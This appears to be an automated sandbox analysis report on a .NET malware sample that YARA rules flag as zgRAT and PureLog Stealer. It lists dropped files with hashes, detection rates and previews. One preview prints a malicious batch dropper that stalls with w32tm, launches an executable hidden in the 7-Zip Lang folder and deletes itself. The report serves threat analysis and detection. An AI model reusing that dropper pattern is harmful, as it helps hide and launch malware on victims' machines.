SHA-512: 372E2A492963AC8734A1C327FECAB91B0CAD8FE398632FD8773CB263A0745F040D2D6A47DB3867C61F075A89433DA4A3746BDE54955E0E5D6A38F74E28BC25E3
Malicious: false
Preview: eGVcsOGXVWI0RjEDdayCdGcnxzuaG3TIpvA5385toPbKDPVqOWTLlGpYorp2eqRbD9KfiIJeeEXNoRkheDLtjHhiGlRLTDP88AHDEzHGNyrgsctXHHYbeh15bmZ707LbyZPoJgdo5FgvaA0n24ELoyd

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: ASCII text, with very long lines (568), with no line terminators
Category: dropped
Size (bytes): 568
Entropy (8bit): 5.888252290124134
Encrypted: false
SSDEEP: 12:NjhrxKm6A3/nx0DcT2D7942OLO4p/WsaWJNjwciCOMCuaknF8Z8:acyDaVp/W7WfjwhCPCmF8C
MD5: 7786CDC95BD57FBC11EB6533BE3B6DFE
SHA1: D2B1A2838E09B235FDAE0F3CF1009675AD2A26D9
SHA-256: F368C17C1B031AD6746CC4D3B4DFAB43278251F1FE3B3C0637E318AB69684DC4
SHA-512: 84EB5CED2A88805FBF976D54C80215087446828F34B19878E89CF9098C06559C97246E98CA8B30ABF3305C2F7CD003CEB3B36ED7008E2BA7E83EE2AF104F9EE9
Malicious: false
                                                  Preview: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

Process: C:\msportComWin\BridgePortsurrogateserverref.exe
File Type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 2002944
Entropy (8bit): 7.567943716522346
Encrypted: false
SSDEEP: 24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
MD5: 5F80A11E82CC7495CF5AD7DF3D052721
SHA1: 3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
SHA-256: 851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
SHA-512: 7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 83%
• Antivirus: Virustotal, Detection: 55%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\services.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1396
                                                  Entropy (8bit):5.350961817021757
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                  Malicious:false
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):19253
                                                  Entropy (8bit):5.006225694120903
                                                  Encrypted:false
                                                  SSDEEP:384:hrib4ZmVoGIpN6KQkj2Fkjh4iUxDhQIeYo+OdBANXp5yvOjJlYoaYpib47:hLmV3IpNBQkj2Uh4iUxDhiYo+OdBANZD
                                                  MD5:6EC700FCB0AE97553EC01FAEA088C747
                                                  SHA1:2D184B28CB5949B49AD548781AD33CDE9BE1F100
                                                  SHA-256:B60FC2B328749BD47822EE102E4F1D1618278CB6C899C9A2AAEF97C1F6410AEF
                                                  SHA-512:D889E914C32104F69181E9880E4ABE98B71B3BDE0784AA7A8D3F20CE083CFACDB922A63935239339AA195A6B1AEB4C69C994C37A08E041C56A5CB5C91049F9DE
                                                  Malicious:false
                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):64
                                                  Entropy (8bit):1.1940658735648508
                                                  Encrypted:false
                                                  SSDEEP:3:Nlllultnxj:NllU
                                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                  Malicious:false
                                                  Preview:@...e................................................@..........
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):25
                                                  Entropy (8bit):4.323856189774723
                                                  Encrypted:false
                                                  SSDEEP:3:kSq+7dddL:kn+7dddL
                                                  MD5:C220191A10AFE8752DD158D96C55B2A4
                                                  SHA1:8BD9A0A4D7B0C86B4EBFC2973D66648444E93DBE
                                                  SHA-256:80425FECFF8DBBE86DECAB0466150D0EB5F5130387174BE68AE0C764162978E4
                                                  SHA-512:6F393F467683FEA0D62A0FD3D92EDEE4DE42F8A81C60E2F419179EFF2875A7E8127D5011D808F6533A0A137834D783553A3283735A5F0122C6187361D1D6BC33
                                                  Malicious:false
                                                  Preview:NLcwnGZBmfptCOt1pNVH8kxkA
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):225
                                                  Entropy (8bit):5.24375311878078
                                                  Encrypted:false
                                                  SSDEEP:6:hCijTg3Nou1SV+DERLv+IvKOZG1cNwi23f7UEh:HTg9uYDERLvXeZDUEh
                                                  MD5:AC7BF65FF0DE2462C1D75DFE1707E73D
                                                  SHA1:19A093CEC9C9FA4C5A8A57DBFE469228F07A17DC
                                                  SHA-256:D94BE9A958C1B956550C5DBFA93BD5C47E83AF0390954AF40387E46C13215372
                                                  SHA-512:4ED4A178C18A6558A004CFD776111818C6E9AF9CFD6424093B718B67155C66C92FD95246D979EE2F1BEC228289E220A36141FBF13AD204B33F6E1CE23B3ED16F
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\8SIf5KWJtt.bat"
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6cc, 10 symbols, created Mon Jan 13 13:39:29 2025, 1st section name ".debug$S"
                                                  Category:modified
                                                  Size (bytes):1924
                                                  Entropy (8bit):4.6147682545775135
                                                  Encrypted:false
                                                  SSDEEP:24:HZm9BaLzcuvZHiwKtGDN6lmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ScN:aaLzLvZZKuklmuulB+hnqXSfbNtmhn
                                                  MD5:FCA6B747F35EAB99AB2AEC32EBA49CF1
                                                  SHA1:4C682F1FB79E3303F315BE86C8DE34063305C53F
                                                  SHA-256:04302F230A136EAA63436FD740AF5F7EB360773853F4AB44B3CCC4F2669541C2
                                                  SHA-512:1320A00066716CDD08AA46370CE82F17E4DB878D0F8C5FC83C5ED45D79F34BC2EAF9754F65DBD932CDD98F5B5A62D8E2915B4A34E5D3E58306337D6593075D95
                                                  Malicious:false
                                                  Preview:L......g.............debug$S........T...................@..B.rsrc$01............................@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E5328BD43674D66B913D17F64F40B9.TMP.....................q.QK.......N..........7.......C:\Users\user~1\AppData\Local\Temp\RES63F2.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\msportComWin.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                  File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e4, 10 symbols, created Mon Jan 13 13:39:30 2025, 1st section name ".debug$S"
                                                  Category:modified
                                                  Size (bytes):1948
                                                  Entropy (8bit):4.566493323979637
                                                  Encrypted:false
                                                  SSDEEP:24:H+jG9E1XOCTZHDwKtGDNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+YEgUZ:RaZ0KuMluOulajfqXSfbNtmhY2Z
                                                  MD5:A7F365634996B4EB5886DB6046ABA3A9
                                                  SHA1:E336F9114FBC2FE1FB78656745A9D25A75DF77B6
                                                  SHA-256:B21A79C9B8202BFF913B34515B624119F5D3ED8B9061A81FDA1B4C3B0580B970
                                                  SHA-512:896424A70A939F04CF3588322A99684EE4DBE5F47F927D63EB8E7EFB1A6D793C6B6469CC86B75B54B2466D908691E26F035BC50B40E1AFBD81811B642A939D70
                                                  Malicious:false
                                                  Preview:L......g.............debug$S........4...................@..B.rsrc$01................`...........@..@.rsrc$02........p...t...............@..@........<....c:\Windows\System32\CSC73DB2FDC8AEF4C699A318C77CEE246D.TMP..................r.av..t.y..............7.......C:\Users\user~1\AppData\Local\Temp\RES6615.tmp.-.<....................a..Microsoft (R) CVTRES.W.=..cwd.C:\msportComWin.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
